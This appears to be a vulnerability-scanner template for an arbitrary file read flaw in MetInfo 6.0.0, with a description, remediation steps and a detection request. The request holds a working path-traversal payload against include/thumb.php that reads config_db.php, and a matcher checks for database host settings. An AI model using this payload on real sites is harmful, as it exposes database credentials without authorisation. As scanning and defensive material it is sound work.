id: Metinfo-V6_0_0-FileRead
info:
  name: MetInfo6.0.0 arbitrary file read vulnerability.
  author:
  - l0ne1y
  description: |-
    MetInfo6.0.0 arbitrary file read vulnerability.
    MetInfo is an open-source, free CMS building system suitable for enterprise websites. The MetInfo enterprise website management system is mainly used to build enterprise websites and uses a PHP+Mysql architecture.

    In MetInfo6.0.0, the include/thumb.php page has an arbitrary file read vulnerability. An attacker can exploit it to obtain sensitive information.
  reference:
  - https://www.freebuf.com/vuls/181698.html
  severity: high
  remediation: |-
    Official Fix:
    1. Upgrade to a non-vulnerable version of the system, or download the security patch from the official site
    https://www.mituo.cn

    Temporary Fix:
    1. Filter ".", preventing users from traversing to parent directories in the URL.
    2. Use strict regular-expression validation of user-input parameter formats. Hard-code or uniformly encode filename parameters passed by the user, use a whitelist for file types, and reject parameters containing malicious or null characters.
    3. Disable directory traversal services; for example, configure open_basedir in php.ini to restrict file access scope.
    4. Store file paths in the database and let users download files by submitting the corresponding file ID.
    5. Verify permissions before allowing a user to download a file.
requests:
- matchers:
  - type: dsl
    dsl:
    - 'status_code==200 && contains(body,"con_db_host") '
  matchers-condition: and
  path:
  - '{{BaseURL}}/include/thumb.php?dir=http\..\..\config\config_db.php'
  method: GET
